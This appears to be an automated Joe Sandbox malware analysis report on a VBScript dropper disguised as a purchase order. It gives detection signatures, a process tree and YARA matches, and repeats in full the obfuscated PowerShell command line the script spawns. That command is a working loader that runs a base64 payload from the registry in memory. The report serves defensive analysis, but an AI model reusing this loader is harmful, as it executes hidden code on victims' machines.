Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SIEM_PO00938467648.vbs

Overview

General Information

Sample Name:SIEM_PO00938467648.vbs
Analysis ID:756154
MD5:633811bccf3fe62978ce41a04b653083
SHA1:bc81307b5c229094617e7cb8cdcaec55eaddad36
SHA256:b5e4225737f935940fa23989440d5ea2c123c8affde25d6d7224e2b4abab5608
Tags:vbs
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Sigma detected: Dot net compiler compiles file from suspicious location
VBScript performs obfuscated calls to suspicious functions
Antivirus detection for URL or domain
Wscript starts Powershell (via cmd or directly)
Potential malicious VBS script found (suspicious strings)
Very long command line found
Potential evasive VBS script found (use of timer() function in loop)
Obfuscated command line found
Machine Learning detection for dropped file
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Found dropped PE file which has not been started or loaded
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Java / VBScript file with very long strings (likely obfuscated code)
Drops PE files
Compiles C# or VB.Net code
Creates a process in suspended mode (likely to inject code)
Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

  • System is w10x64
  • wscript.exe (PID: 8 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SIEM_PO00938467648.vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • cmd.exe (PID: 2976 cmdline: CMD.EXE /c echo C:\Windows MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
      • conhost.exe (PID: 1516 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • powershell.exe (PID: 2528 cmdline: C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Biliate = """LaABrdGedGa-StTDiyCopsteUn St-UdThoyAupepeWrDReeTrfPaiUsnUmiRetCoiMaoFrnSv Sm'ReuSksUniFunCogKn ToSPhyPrsJatNueSimst;viuSmsPriSknangIm PrSPlyEusGrtgueoemFo.ReRPuuConHutSoiFrmFreIl.JoIFonSntSneLurCooPapJaSTreRerElvKuiticReeFesBr;AmpUpuKobsnlVoiDecAw sasRutRhajetaaiTecSv BrcEslFoaUnsVasLe EbTInuBaeBaiOurCeoKonPr1Ci Sh{Ti[PhDAflUllBuIMimHapMaoAfrEutAn(ad`"""InuLusKieKarMe3Br2Si`"""Rr)Ri]GopMauFlbStlMeiTycSa AesKatInaHjtSmiSvcNe SteHoxattImeTerOpnNa GriBenBrtNo YdDMieResTotEnrBroStyOvCspaMerMieCotKl(sn)Me;Sm[AfDEplLulReIenmFlpRdoHarEgtBr(Ov`"""MigAldMeiPl3In2Er`"""Te)Ce]tapEuuDrbCulMaiHjcAs LgsUdtTraBrtSqiercCo VieBexTetVeetrrHrnMa FoiBanArtHa StSBrcUdaGrlLaeSkWTeiScnSudReoBuwCrEVexChtstESuxKn(NoiFinKutSe MoDLnrIgiBefRatPl,ReiAnnAltJu BeAUdmAmbMiuPalHeaAp,DiiFonKntSp juBpraSesVaoQu,MaiLenImtBa NoiAfaDagVrtPotSyaOv,ChiGenpltRe diVSaeTvjSimboaSotAn1Un5Fr8Ud,GiiTinSttEr YeMSucSlgKurSk)Eg;Ak[KuDDilBulImIRdmAmpAnoVarPrtFr(Sk`"""SvkSqeRorpinFleRelPa3Ov2as`"""Tr)Wo]hepMeuRobBalFriLucRe HysMitFoaUntTaiTmcJa aneDexMitKueSarBlnOi ReiFanSutov drHDeeStaBapBlSBeiSpzBaeKo(StiUnnDitOu YcPKerBroUrpRe,PhiSonxatCl AiANodStrCheFosOv,ViiDenJutDi MuTImoWerArtInrfriPo)Mo;Co[SlDOplSalSpIApmunpReoSjrRotKo(wh`"""JgsSchdieBilShlko3Ge2re.VadUflOmlUn`"""St)Un]BepPauSlbOslBeiUncAs MasMntSyaLetFriTrcpr NoeVixRatFoeRerWenun SevEnofuiTrdRh PaDterFlaFigMeFCiiEnnStiKasBehMi(EsiBonSutPo OpOMumPldSerGe)Ba;Ej[SpDFalBelMeILimhepFroUdrGutAu(Je`"""mawSkifanTemNumIn.ApdKolBolFl`"""Fu)Ho]ScpOvuPrbMdlViiAlcBa BosSatAsaHotLiiFocSi VeeNoxLutHaeBirJenLa HoiennNatGu ArmtjiHoxSceDarTrGSwejotCoDTreFivSuCKeaMipqusSu(SkiBlnCitCh BeNPriBrtSerUd,UditinCotJo VaFaseEwlOb,ThivinQutEo NoAPhfAfsXi9Im3Bl)Ta;Ls[ChDCulCalHaIPumCipIcoFarRetSl(Be`"""RekGleTrrhinAteSilEk3Sa2ur`"""Ti)De]PapFeuDrbFolOpiLkcTn BusAbtSyaUdtMeiSocfr CoeImxFatMoeFrrnanto triMenTotAl KaLUdoEscAskQuRosepasphoOvuForJucApeph(RoiAfnCotTe VeLExeSoiUn)Ir;Un[ReDPilIwlOyILammipShoStrFatCr(Bo`"""FlkAueCervanToeJelAv3Pl2Re`"""Se)Co]UnpAnuCobOplFoilacLa CasrotOpaUntMuiKacTi WieKnxEntReeUdrTrnTr AriPonIntSl PiVIniStrpetrauAcaTilvaATelBelCloThcFa(TriStnSotWi GevGr1Sk,SmiLunThtOr CavBl2Ne,KeiStnCotBy Hevdr3pa,HeiGanUptku SvvCa4In)pr;Py[DrDMalInlPrIBrmHepPloKnrPttba(Ho`"""CrAUnDBeVAlAToPanICr3St2Ph.WaDBeLSaLCi`"""To)Un]StpTiuRebSylPuiEncFo CosMotUnaUntHuiAtcst MeeMixDotOfeAdrInnRo SuvBeoUpiVidTi CiMTraBipBeGAteOenSleGlrPriBrcCoMFiaUnsAnkVn(SaiSknMetPe PlBInrTriOdnObkIr,DoiDenQutRu CaMChiUddtitKnsSn)In;Ov[TrDRelSelFuIUnmRipGoosurOmtSc(Ve`"""BrkVaeMerManPeeSklSt3Co2In`"""ef)Ce]BepKouMybKolLbiCocUn EdsGatKuaTetKoiaacLu NoeVexPrtNeeUnrAnnCy PrISenLvtPlPFotBorkr ScEGanSuumemfuSChyFrsPotBeeOomFjLGuoFlcSraNelGaeVosPrWUn(PauDiiEynSttPe GrvEx1ma,PsiHanKotEn KovGr2Ha)Et;Om[OoDrhlDilFlIsumEnpSkoOvrTrtSp(St`"""ObkEdeElrRenTaeDalDi3Sc2Di`"""Si)Ni]FopChuTlbDalCaiAlcLi SmsNytvaaretPriSucTr LueBexGatTreGerManbr ReiGunentAn UnSGieUntTiTEnhPorBieSoaVadEmABlfPafPaiChnFeimitSpySlMPraNisBrkab(CeiNgnCatCr teRBeedebOuuFoiAflUn,BriSlnFitBa SuSTeeAnmHeiDasRr)Ho;Ba[TrDTrlSplVaIMamSapMaoCortitPr(Ud`"""StuNosKoeJorEl3En2Sp`"""St)Bu]chpReuBlbGulFliCacUn OusOutScaUntGoiRecor SteabxArtcheSerBunFo PoiRenJotMi SpSKoeAftJuMEmeInnReuBjIPrtFieStmXeIHongefFeoSi(OpiTrnmotSu ReCRhaBlbBrrSoiSk,AaiDonSktDo reOTepFiaNolUt,UniBunSutFl ClHskaFoaEn,whiHinSptIn GaARemCopFluPr)Ti;Ge}As'Et;Sp`$SpTPtuDueudiKorTooTonPi3Lu=Oo[JgTShuAueAuiFrrAcoovnRe1Bi]Ac:Do:LiVAnikdrBltniuSwaNolWeAStldelNooFocFo(Va0Co,Dr1Un0Ha4An8In5Un7Im6He,al1En2Pr2Ek8St8Gu,Bl6Co4Un)Pe;Ro`$ProFurUpnSaiBetTrhProAasChaBruDarTiiEsaSlnKi=Fi(EkGReeustDe-PrIDetBeeRemSkPGurPloPipReeStrSktMiyOt Ej-JePVeaMatrehTr Sn'EfHPrKTrCuaUSp:Vi\DePgoeMidpnaMigunoOvgCl\ReDCaeVofHmiIbbZerHaiFolSolcoaBatRaiChoPunoveBlnDosMo'Sk)Le.CaELilPluFrtFoiPyoFrnQu;ir`$PoiTanPotGouCurBinHveSidAl Po=sp er[PrSAeyKosIntUneTymTi.LuCGaoUbnDavTheAarIntNe]Ox:Zi:ApFGurMuoCamSoBAwaResFreHo6Sa4StSNitLnrUniGunUngFo(St`$ApobjrAunCriIntCohUnoPosUnaKeuMarAniNoaUnnAr)Fo;Sk[TrSEjyAfsVitWaeTimre.GeRGnuFonUntStiKrmUneJo.trILenSatHeeGorsioLopSeSSteDarchvMeiBicBoeEssAj.FeMBraAprNjsFohUnaUnlBa]Me:Ov:haCUdoBrpFjyBr(Ne`$DaiKanBetSluAnrOmnLgePidRe,Sc Fe0yo,Su Na Ko`$PeTMuuUneLiizirEmoannin3Do,Ci Pl`$RiiXanMitSpuSorThnTeeRedMa.SocAloStuRhnKotsp)Ta;Un[FaTKouveeLsifarNooPrnFr1st]Be:Dy:EsEManNouUnmboSUnyTisAstDieMomViLTeoBecDeaUrlBueUnsNoWUn(Po`$AbTPruSyePriAurSkoSinPr3Sk,Uk St0Ha)Ug#Sm;""";Function Tueiron4 { param([String]$sheikdmmerne); For($circumtropical=2; $circumtropical -lt $sheikdmmerne.Length-1; $circumtropical+=(2+1)){ $Driblende = $Driblende + $sheikdmmerne.Substring($circumtropical, 1); } $Driblende;}$Reptilious0 = Tueiron4 'DaIKgEtiXSk ';$Reptilious1= Tueiron4 $Biliate;&$Reptilious0 $Reptilious1;; MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 2188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 4184 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jadyuuoq\jadyuuoq.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)
        • cvtres.exe (PID: 6012 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8B47.tmp" "c:\Users\user\AppData\Local\Temp\jadyuuoq\CSC891590C19254105A6A792E8745AF5FD.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
SIEM_PO00938467648.vbsWScript_Shell_PowerShell_ComboDetects malware from Middle Eastern campaign reported by TalosFlorian Roth
  • 0xa35:$s1: .CreateObject("WScript.Shell")
  • 0x3e4db:$p1: powershell.exe
  • 0x4b22c:$p1: powershell.exe
SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 2528INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0xc14e:$b2: ::FromBase64String(
  • 0xd089:$b2: ::FromBase64String(
  • 0x15f18:$b2: ::FromBase64String(
  • 0x104597:$b2: ::FromBase64String(
  • 0x10b6f5:$b2: ::FromBase64String(
  • 0x33c33:$s1: -join
  • 0x40d08:$s1: -join
  • 0x440da:$s1: -join
  • 0x4478c:$s1: -join
  • 0x4627d:$s1: -join
  • 0x48483:$s1: -join
  • 0x48caa:$s1: -join
  • 0x4951a:$s1: -join
  • 0x49c55:$s1: -join
  • 0x49c87:$s1: -join
  • 0x49ccf:$s1: -join
  • 0x49cee:$s1: -join
  • 0x4a53e:$s1: -join
  • 0x4a6ba:$s1: -join
  • 0x4a732:$s1: -join
  • 0x4a7c5:$s1: -join
SourceRuleDescriptionAuthorStrings
amsi64_8.amsi.csvWScript_Shell_PowerShell_ComboDetects malware from Middle Eastern campaign reported by TalosFlorian Roth
  • 0x1a:$s1: .CreateObject("WScript.Shell")
  • 0x72:$s1: .CreateObject("WScript.Shell")
  • 0x1da:$p1: powershell.exe

Data Obfuscation

barindex
Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jadyuuoq\jadyuuoq.cmdline, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jadyuuoq\jadyuuoq.cmdline, CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Biliate = """LaABrdGedGa-StTDiyCopsteUn St-UdThoyAupepeWrDReeTrfPaiUsnUmiRetCoiMaoFrnSv Sm'ReuSksUniFunCogKn ToSPhyPrsJatNueSimst;viuSmsPriSknangIm PrSPlyEusGrtgueoemFo.ReRPuuConHutSoiFrmFreIl.JoIFonSntSneLurCooPapJaSTreRerElvKuiticReeFesBr;AmpUpuKobsnlVoiDecAw sasRutRhajetaaiTecSv BrcEslFoaUnsVasLe EbTInuBaeBaiOurCeoKonPr1Ci Sh{Ti[PhDAflUllBuIMimHapMaoAfrEutAn(ad`"""InuLusKieKarMe3Br2Si`"""Rr)Ri]GopMauFlbStlMeiTycSa AesKatInaHjtSmiSvcNe SteHoxattImeTerOpnNa GriBenBrtNo YdDMieResTotEnrBroStyOvCspaMerMieCotKl(sn)Me;Sm[AfDEplLulReIenmFlpRdoHarEgtBr(Ov`"""MigAldMeiPl3In2Er`"""Te)Ce]tapEuuDrbCulMaiHjcAs LgsUdtTraBrtSqiercCo VieBexTetVeetrrHrnMa FoiBanArtHa StSBrcUdaGrlLaeSkWTeiScnSudReoBuwCrEVexChtstESuxKn(NoiFinKutSe MoDLnrIgiBefRatPl,ReiAnnAltJu BeAUdmAmbMiuPalHeaAp,DiiFonKntSp juBpraSesVaoQu,MaiLenImtBa NoiAfaDagVrtPotSyaOv,ChiGenpltRe diVSaeTvjSimboaSotAn1Un5Fr8Ud,GiiTinSttEr YeMSucSlgKurSk)Eg;Ak[KuDDilBulImIRdmAmpAnoVarPrtFr(Sk`"""SvkSqeRorpinFleRelPa3Ov2as`"""Tr)Wo]hepMeuRobBalFriLucRe HysMitFoaUntTaiTmcJa aneDexMitKueSarBlnOi ReiFanSutov drHDeeStaBapBlSBeiSpzBaeKo(StiUnnDitOu YcPKerBroUrpRe,PhiSonxatCl AiANodStrCheFosOv,ViiDenJutDi MuTImoWerArtInrfriPo)Mo;Co[SlDOplSalSpIApmunpReoSjrRotKo(wh`"""JgsSchdieBilShlko3Ge2re.VadUflOmlUn`"""St)Un]BepPauSlbOslBeiUncAs MasMntSyaLetFriTrcpr NoeVixRatFoeRerWenun SevEnofuiTrdRh PaDterFlaFigMeFCiiEnnStiKasBehMi(EsiBonSutPo OpOMumPldSerGe)Ba;Ej[SpDFalBelMeILimhepFroUdrGutAu(Je`"""mawSkifanTemNumIn.ApdKolBolFl`"""Fu)Ho]ScpOvuPrbMdlViiAlcBa BosSatAsaHotLiiFocSi VeeNoxLutHaeBirJenLa HoiennNatGu ArmtjiHoxSceDarTrGSwejotCoDTreFivSuCKeaMipqusSu(SkiBlnCitCh BeNPriBrtSerUd,UditinCotJo VaFaseEwlOb,ThivinQutEo NoAPhfAfsXi9Im3Bl)Ta;Ls[ChDCulCalHaIPumCipIcoFarRetSl(Be`"""RekGleTrrhinAteSilEk3Sa2ur`"""Ti)De]PapFeuDrbFolOpiLkcTn BusAbtSyaUdtMeiSocfr CoeImxFatMoeFrrnanto triMenTotAl KaLUdoEscAskQuRosepasphoOvuForJucApeph(RoiAfnCotTe VeLExeSoiUn)Ir;Un[ReDPilIwlOyILammipShoStrFatCr(Bo`"""FlkAueCervanToeJelAv3Pl2Re`"""Se)Co]UnpAnuCobOplFoilacLa CasrotOpaUntMuiKacTi WieKnxEntReeUdrTrnTr AriPonIntSl PiVIniStrpetrauAcaTilvaATelBelCloThcFa(TriStnSotWi GevGr1Sk,SmiLunThtOr CavBl2Ne,KeiStnCotBy Hevdr3pa,HeiGanUptku SvvCa4In)pr;Py[DrDMalInlPrIBrmHepPloKnrPttba(Ho`"""CrAUnDBeVAlAToPanICr3St2Ph.WaDBeLSaLCi`"""To)Un]StpTiuRebSylPuiEncFo CosMotUnaUntHuiAtcst MeeMixDotOfeAdrInnRo SuvBeoUpiVidTi CiMTraBipBeGAteOenSle
No Snort rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: SIEM_PO00938467648.vbsReversingLabs: Detection: 34%
Source: http://pesterbdd.com/images/Pester.png7zAvira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Temp\jadyuuoq\jadyuuoq.dllJoe Sandbox ML: detected
Source: Binary string: ,l7C:\Users\user\AppData\Local\Temp\jadyuuoq\jadyuuoq.pdb source: powershell.exe, 00000003.00000002.833248284.00000000053E0000.00000004.00000800.00020000.00000000.sdmp
Source: powershell.exe, 00000003.00000002.820596079.000000000319B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000003.00000003.499891635.0000000007E61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000003.485360796.0000000007E5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.microsof
Source: powershell.exe, 00000003.00000002.843893534.0000000005CFF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000003.00000002.825069485.0000000004DDE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000003.00000002.825069485.0000000004DDE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png7z
Source: powershell.exe, 00000003.00000002.823390885.0000000004CA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000003.00000002.825069485.0000000004DDE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000003.00000002.825069485.0000000004DDE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html7z
Source: powershell.exe, 00000003.00000002.843893534.0000000005CFF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000003.00000002.843893534.0000000005CFF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000003.00000002.843893534.0000000005CFF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000003.00000002.825069485.0000000004DDE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000003.00000002.825069485.0000000004DDE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester7z
Source: powershell.exe, 00000003.00000002.843893534.0000000005CFF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe

System Summary

barindex
Source: Process Memory Space: powershell.exe PID: 2528, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\Windows
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Biliate = """LaABrdGedGa-StTDiyCopsteUn St-UdThoyAupepeWrDReeTrfPaiUsnUmiRetCoiMaoFrnSv Sm'ReuSksUniFunCogKn ToSPhyPrsJatNueSimst;viuSmsPriSknangIm PrSPlyEusGrtgueoemFo.ReRPuuConHutSoiFrmFreIl.JoIFonSntSneLurCooPapJaSTreRerElvKuiticReeFesBr;AmpUpuKobsnlVoiDecAw sasRutRhajetaaiTecSv BrcEslFoaUnsVasLe EbTInuBaeBaiOurCeoKonPr1Ci Sh{Ti[PhDAflUllBuIMimHapMaoAfrEutAn(ad`"""InuLusKieKarMe3Br2Si`"""Rr)Ri]GopMauFlbStlMeiTycSa AesKatInaHjtSmiSvcNe SteHoxattImeTerOpnNa GriBenBrtNo YdDMieResTotEnrBroStyOvCspaMerMieCotKl(sn)Me;Sm[AfDEplLulReIenmFlpRdoHarEgtBr(Ov`"""MigAldMeiPl3In2Er`"""Te)Ce]tapEuuDrbCulMaiHjcAs LgsUdtTraBrtSqiercCo VieBexTetVeetrrHrnMa FoiBanArtHa StSBrcUdaGrlLaeSkWTeiScnSudReoBuwCrEVexChtstESuxKn(NoiFinKutSe MoDLnrIgiBefRatPl,ReiAnnAltJu BeAUdmAmbMiuPalHeaAp,DiiFonKntSp juBpraSesVaoQu,MaiLenImtBa NoiAfaDagVrtPotSyaOv,ChiGenpltRe diVSaeTvjSimboaSotAn1Un5Fr8Ud,GiiTinSttEr YeMSucSlgKurSk)Eg;Ak[KuDDilBulImIRdmAmpAnoVarPrtFr(Sk`"""SvkSqeRorpinFleRelPa3Ov2as`"""Tr)Wo]hepMeuRobBalFriLucRe HysMitFoaUntTaiTmcJa aneDexMitKueSarBlnOi ReiFanSutov drHDeeStaBapBlSBeiSpzBaeKo(StiUnnDitOu YcPKerBroUrpRe,PhiSonxatCl AiANodStrCheFosOv,ViiDenJutDi MuTImoWerArtInrfriPo)Mo;Co[SlDOplSalSpIApmunpReoSjrRotKo(wh`"""JgsSchdieBilShlko3Ge2re.VadUflOmlUn`"""St)Un]BepPauSlbOslBeiUncAs MasMntSyaLetFriTrcpr NoeVixRatFoeRerWenun SevEnofuiTrdRh PaDterFlaFigMeFCiiEnnStiKasBehMi(EsiBonSutPo OpOMumPldSerGe)Ba;Ej[SpDFalBelMeILimhepFroUdrGutAu(Je`"""mawSkifanTemNumIn.ApdKolBolFl`"""Fu)Ho]ScpOvuPrbMdlViiAlcBa BosSatAsaHotLiiFocSi VeeNoxLutHaeBirJenLa HoiennNatGu ArmtjiHoxSceDarTrGSwejotCoDTreFivSuCKeaMipqusSu(SkiBlnCitCh BeNPriBrtSerUd,UditinCotJo VaFaseEwlOb,ThivinQutEo NoAPhfAfsXi9Im3Bl)Ta;Ls[ChDCulCalHaIPumCipIcoFarRetSl(Be`"""RekGleTrrhinAteSilEk3Sa2ur`"""Ti)De]PapFeuDrbFolOpiLkcTn BusAbtSyaUdtMeiSocfr CoeImxFatMoeFrrnanto triMenTotAl KaLUdoEscAskQuRosepasphoOvuForJucApeph(RoiAfnCotTe VeLExeSoiUn)Ir;Un[ReDPilIwlOyILammipShoStrFatCr(Bo`"""FlkAueCervanToeJelAv3Pl2Re`"""Se)Co]UnpAnuCobOplFoilacLa CasrotOpaUntMuiKacTi WieKnxEntReeUdrTrnTr AriPonIntSl PiVIniStrpetrauAcaTilvaATelBelCloThcFa(TriStnSotWi GevGr1Sk,SmiLunThtOr CavBl2Ne,KeiStnCotBy Hevdr3pa,HeiGanUptku SvvCa4In)pr;Py[DrDMalInlPrIBrmHepPloKnrPttba(Ho`"""CrAUnDBeVAlAToPanICr3St2Ph.WaDBeLSaLCi`"""To)Un]StpTiuRebSylPuiEncFo CosMotUnaUntHuiAtcst MeeMixDotOfeAdrInnRo SuvBeoUpiVidTi CiMTraBipBeGAteOenSleGlrPriBrcCoMFiaUnsAnkVn(SaiSknMetPe PlBInrTriOdnObkIr,DoiDenQutRu CaMChiUddtitKnsSn)In;Ov[TrDRelSelFuIUnmRipGoosurOmtSc(Ve`"""BrkVaeMerManPeeSklSt3Co2In`"""ef)Ce]BepKouMybKolLbiCocUn EdsGatKuaTetKoiaacLu NoeVexPrtNeeUnrAnnCy PrISenLvtPlPFotBorkr ScEGanSuumemfuSChyFrsPotBeeOomFjLGuoFlcSraNelGaeVosPrWUn(PauDiiEynSttPe GrvEx1ma,PsiHanKotEn KovGr2Ha)Et;Om[OoDrhlDilFlIsumEnpSkoOvrTrtSp(St`"""ObkEdeElrRenTaeDalDi3Sc2Di`"""Si)Ni]FopChuTlbDalCaiAlcLi SmsNytvaaretPriSucTr LueBexGatTreGerManbr ReiGunentAn UnSGieUntTiTEn
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\Windows
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Biliate = """LaABrdGedGa-StTDiyCopsteUn St-UdThoyAupepeWrDReeTrfPaiUsnUmiRetCoiMaoFrnSv Sm'ReuSksUniFunCogKn ToSPhyPrsJatNueSimst;viuSmsPriSknangIm PrSPlyEusGrtgueoemFo.ReRPuuConHutSoiFrmFreIl.JoIFonSntSneLurCooPapJaSTreRerElvKuiticReeFesBr;AmpUpuKobsnlVoiDecAw sasRutRhajetaaiTecSv BrcEslFoaUnsVasLe EbTInuBaeBaiOurCeoKonPr1Ci Sh{Ti[PhDAflUllBuIMimHapMaoAfrEutAn(ad`"""InuLusKieKarMe3Br2Si`"""Rr)Ri]GopMauFlbStlMeiTycSa AesKatInaHjtSmiSvcNe SteHoxattImeTerOpnNa GriBenBrtNo YdDMieResTotEnrBroStyOvCspaMerMieCotKl(sn)Me;Sm[AfDEplLulReIenmFlpRdoHarEgtBr(Ov`"""MigAldMeiPl3In2Er`"""Te)Ce]tapEuuDrbCulMaiHjcAs LgsUdtTraBrtSqiercCo VieBexTetVeetrrHrnMa FoiBanArtHa StSBrcUdaGrlLaeSkWTeiScnSudReoBuwCrEVexChtstESuxKn(NoiFinKutSe MoDLnrIgiBefRatPl,ReiAnnAltJu BeAUdmAmbMiuPalHeaAp,DiiFonKntSp juBpraSesVaoQu,MaiLenImtBa NoiAfaDagVrtPotSyaOv,ChiGenpltRe diVSaeTvjSimboaSotAn1Un5Fr8Ud,GiiTinSttEr YeMSucSlgKurSk)Eg;Ak[KuDDilBulImIRdmAmpAnoVarPrtFr(Sk`"""SvkSqeRorpinFleRelPa3Ov2as`"""Tr)Wo]hepMeuRobBalFriLucRe HysMitFoaUntTaiTmcJa aneDexMitKueSarBlnOi ReiFanSutov drHDeeStaBapBlSBeiSpzBaeKo(StiUnnDitOu YcPKerBroUrpRe,PhiSonxatCl AiANodStrCheFosOv,ViiDenJutDi MuTImoWerArtInrfriPo)Mo;Co[SlDOplSalSpIApmunpReoSjrRotKo(wh`"""JgsSchdieBilShlko3Ge2re.VadUflOmlUn`"""St)Un]BepPauSlbOslBeiUncAs MasMntSyaLetFriTrcpr NoeVixRatFoeRerWenun SevEnofuiTrdRh PaDterFlaFigMeFCiiEnnStiKasBehMi(EsiBonSutPo OpOMumPldSerGe)Ba;Ej[SpDFalBelMeILimhepFroUdrGutAu(Je`"""mawSkifanTemNumIn.ApdKolBolFl`"""Fu)Ho]ScpOvuPrbMdlViiAlcBa BosSatAsaHotLiiFocSi VeeNoxLutHaeBirJenLa HoiennNatGu ArmtjiHoxSceDarTrGSwejotCoDTreFivSuCKeaMipqusSu(SkiBlnCitCh BeNPriBrtSerUd,UditinCotJo VaFaseEwlOb,ThivinQutEo NoAPhfAfsXi9Im3Bl)Ta;Ls[ChDCulCalHaIPumCipIcoFarRetSl(Be`"""RekGleTrrhinAteSilEk3Sa2ur`"""Ti)De]PapFeuDrbFolOpiLkcTn BusAbtSyaUdtMeiSocfr CoeImxFatMoeFrrnanto triMenTotAl KaLUdoEscAskQuRosepasphoOvuForJucApeph(RoiAfnCotTe VeLExeSoiUn)Ir;Un[ReDPilIwlOyILammipShoStrFatCr(Bo`"""FlkAueCervanToeJelAv3Pl2Re`"""Se)Co]UnpAnuCobOplFoilacLa CasrotOpaUntMuiKacTi WieKnxEntReeUdrTrnTr AriPonIntSl PiVIniStrpetrauAcaTilvaATelBelCloThcFa(TriStnSotWi GevGr1Sk,SmiLunThtOr CavBl2Ne,KeiStnCotBy Hevdr3pa,HeiGanUptku SvvCa4In)pr;Py[DrDMalInlPrIBrmHepPloKnrPttba(Ho`"""CrAUnDBeVAlAToPanICr3St2Ph.WaDBeLSaLCi`"""To)Un]StpTiuRebSylPuiEncFo CosMotUnaUntHuiAtcst MeeMixDotOfeAdrInnRo SuvBeoUpiVidTi CiMTraBipBeGAteOenSleGlrPriBrcCoMFiaUnsAnkVn(SaiSknMetPe PlBInrTriOdnObkIr,DoiDenQutRu CaMChiUddtitKnsSn)In;Ov[TrDRelSelFuIUnmRipGoosurOmtSc(Ve`"""BrkVaeMerManPeeSklSt3Co2In`"""ef)Ce]BepKouMybKolLbiCocUn EdsGatKuaTetKoiaacLu NoeVexPrtNeeUnrAnnCy PrISenLvtPlPFotBorkr ScEGanSuumemfuSChyFrsPotBeeOomFjLGuoFlcSraNelGaeVosPrWUn(PauDiiEynSttPe GrvEx1ma,PsiHanKotEn KovGr2Ha)Et;Om[OoDrhlDilFlIsumEnpSkoOvrTrtSp(St`"""ObkEdeElrRenTaeDalDi3Sc2Di`"""Si)Ni]FopChuTlbDalCaiAlcLi SmsNytvaaretPriSucTr LueBexGatTreGerManbr ReiGunentAn UnSGieUntTiTEn
